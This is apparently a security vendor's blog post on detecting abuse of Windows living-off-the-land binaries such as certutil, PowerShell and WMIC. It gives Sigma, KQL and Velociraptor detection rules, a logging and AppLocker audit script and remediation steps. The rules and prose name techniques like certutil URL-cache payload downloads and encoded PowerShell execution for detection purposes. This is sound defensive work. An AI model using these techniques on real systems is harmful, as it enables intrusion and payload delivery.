Back to Intelligence

LoLBin TTPs: Detecting Abuse of PowerShell, Certutil, and WMIC Based on Bitdefender Analysis

SA
Security Arsenal Team
May 16, 2026
6 min read

Bitdefender's recent analysis, "What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack Surface," delivers a critical wake-up call for the security industry. After 45 days of monitoring their own administrative telemetry, researchers confirmed what incident responders have known for years: the most dangerous activity inside an organization does not look like malware; it looks like administration.

The modern attack surface is defined not by zero-day vulnerabilities, but by the abuse of trusted utilities—Living-off-the-Land Binaries (LoLBins). Tools like PowerShell, WMIC, netsh, Certutil, and MSBuild are signed, trusted, and ubiquitous. Because they are essential for IT operations, they are whitelisted by default, providing the perfect camouflage for threat actors. This analysis highlights the urgent need for defenders to move beyond signature-based detection and focus on behavioral anomaly detection and strict configuration control.

Technical Analysis

The Threat: Living-off-the-Land (LotL)

Affected Products/Platforms:

  • Operating Systems: Microsoft Windows (Server and Client versions)
  • Key Binaries (LoLBins): powershell.exe, certutil.exe, wmic.exe, netsh.exe, msbuild.exe.

The Attack Mechanism: Threat actors leverage these pre-installed tools to perform malicious actions that bypass standard allow-lists and antivirus heuristics.

  • PowerShell: Used for execution, code injection, and lateral movement.
  • Certutil: Originally for certificate management, widely abused to download malicious payloads from remote URLs (URLCache) or decode Base64-encoded files.
  • WMIC: Utilized for system reconnaissance, lateral movement, and process execution.
  • MSBuild: Abused to compile inline C# code on the fly, serving as a fileless malware loader.
  • Netsh: Used to configure network settings and often employed to disable firewalls or proxy traffic.

Exploitation Status: This technique is Confirmed Active and is a staple in modern ransomware operations, nation-state intrusions (e.g., APT29), and commodity malware loaders. It is categorized as a TTP (Tactics, Techniques, and Procedures) rather than a specific CVE, making patching irrelevant; the vulnerability is the configuration of the environment itself.

Detection & Response

Detecting LoLBin abuse requires identifying anomalous command-line arguments and parent-child process relationships that deviate from standard administrative baselines.

SIGMA Rules

YAML
---
title: Potential Certutil Download Activity
id: 1a23b456-7890-12cd-34ef-567890abcdef1
status: experimental
description: Detects usage of certutil to download remote content, a common LOLbin technique.
references:
  - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - '-urlcache'
      - '-verifyctl'
      - '-ping'
  condition: selection
falsepositives:
  - Legitimate administration of certificate stores (rare to use urlcache for this)
level: high
---
title: Suspicious PowerShell Encoded Command
id: 2b34c567-8901-23de-45fa-678901bcdef2
status: experimental
description: Detects PowerShell commands with encoded arguments, often used to obfuscate malicious scripts.
references:
  - https://attack.mitre.org/techniques/T1059/001/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - ' -enc '
      - ' -encodedcommand '
      - ' -e '
      - ' -ec '
  filter:
    CommandLine|contains: 'Endpoint' # Common false positive in some mgmt agents
  condition: selection and not filter
falsepositives:
  - System management scripts that use encoding for obfuscation (should be baselined)
level: medium
---
title: WMIC Process Call Creation
id: 3c45d678-9012-34ef-56ab-789012cdef34
status: experimental
description: Detects WMIC executing a process, commonly used for lateral movement or LOLBin execution.
references:
  - https://attack.mitre.org/techniques/T1047/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1047
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\wmic.exe'
    CommandLine|contains: 'process call create'
  condition: selection
falsepositives:
  - Legacy system management scripts
level: high

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for LoLBin abuse: Certutil, PowerShell Encoded, and WMIC
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (ProcessVersionInfoOriginalFileName == "certutil.exe" and (CommandLine contains "-urlcache" or CommandLine contains "-verifyctl"))
   or (ProcessVersionInfoOriginalFileName == "powershell.exe" and (CommandLine contains " -enc " or CommandLine contains " -encodedcommand "))
   or (ProcessVersionInfoOriginalFileName == "wmic.exe" and CommandLine contains "process call create")
| project Timestamp, DeviceName, AccountName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for suspicious LoLBin command line arguments
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE Name =~ 'certutil.exe' 
   AND (CommandLine =~ '-urlcache' OR CommandLine =~ '-verifyctl')
   OR Name =~ 'powershell.exe'
   AND (CommandLine =~ '-enc' OR CommandLine =~ '-encodedcommand')
   OR Name =~ 'wmic.exe'
   AND CommandLine =~ 'process call create'

Remediation Script (PowerShell)

This script performs a basic assessment of PowerShell logging status and checks for common AppLocker policies that restrict binary usage.

PowerShell
# Audit PowerShell Script Block Logging and AppLocker Status
Write-Host "[+] Checking PowerShell Script Block Logging..." -ForegroundColor Cyan
$ScriptBlockLog = Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -ErrorAction SilentlyContinue
if ($ScriptBlockLog.EnableScriptBlockLogging -eq 1) {
    Write-Host "    [*] Script Block Logging is ENABLED." -ForegroundColor Green
} else {
    Write-Host "    [!] Script Block Logging is NOT ENFORCED. Recommend enabling via GPO." -ForegroundColor Red
}

Write-Host "[+] Checking Module Logging..." -ForegroundColor Cyan
$ModuleLog = Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -ErrorAction SilentlyContinue
if ($ModuleLog.EnableModuleLogging -eq 1) {
    Write-Host "    [*] Module Logging is ENABLED." -ForegroundColor Green
} else {
    Write-Host "    [!] Module Logging is NOT ENFORCED. Recommend enabling via GPO." -ForegroundColor Red
}

Write-Host "[+] Checking AppLocker Services..." -ForegroundColor Cyan
$AppIDsvc = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
if ($AppIDsvc.Status -eq 'Running') {
    Write-Host "    [*] AppLocker Identity Service is Running." -ForegroundColor Green
    # Check for effective rules (simplified check)
    $RuleExists = Get-AppLockerPolicy -Effective -ErrorAction SilentlyContinue
    if ($RuleExists) {
        Write-Host "    [*] Effective AppLocker Policies found." -ForegroundColor Green
    } else {
        Write-Host "    [!] No effective AppLocker Policies found. Policies are required to restrict LoLBins." -ForegroundColor Red
    }
} else {
    Write-Host "    [!] AppLocker Service is not running. Cannot enforce LoLBin restrictions." -ForegroundColor Red
}

Remediation

Mitigating the risks associated with LoLBins requires a defense-in-depth approach focused on reducing the utility of these tools for attackers while maintaining administrative functionality.

  1. Enable Advanced PowerShell Logging:

    • Action: Enable Module Logging, Script Block Logging, and Transcription via Group Policy.
    • Why: This captures the actual content of obfuscated scripts (even those executed via -EncodedCommand) to a centralized log (e.g., Sentinel or SIEM).
    • Reference: Microsoft PowerShell Logging

  2. **Implement Application Control (AppLocker/WDAC):

    • Action: Deploy Windows Defender Application Control (WDAC) or AppLocker to restrict the execution of binaries like msbuild.exe or certutil.exe to specific trusted users or paths.
    • Why: Prevents standard users (and compromised user accounts) from leveraging admin tools.

  3. Reduce Administrative Privileges:

    • Action: Enforce Just-In-Time (JIT) access and Just Enough Administration (JEA).
    • Why: If the attacker compromises a standard user account, they cannot execute the high-privilege commands often chained with LoLBins.

  4. Network Segmentation and Egress Filtering:

    • Action: Block outbound internet access for systems that do not require it. Specifically, restrict certutil.exe and powershell.exe from contacting external IPs.
    • Why: Severely hampers the ability of LoLBins to download second-stage payloads.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub

sigma-rulekql-detectionthreat-huntingdetection-engineeringsiem-detectionlolbinswindows-securitybitdefender

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action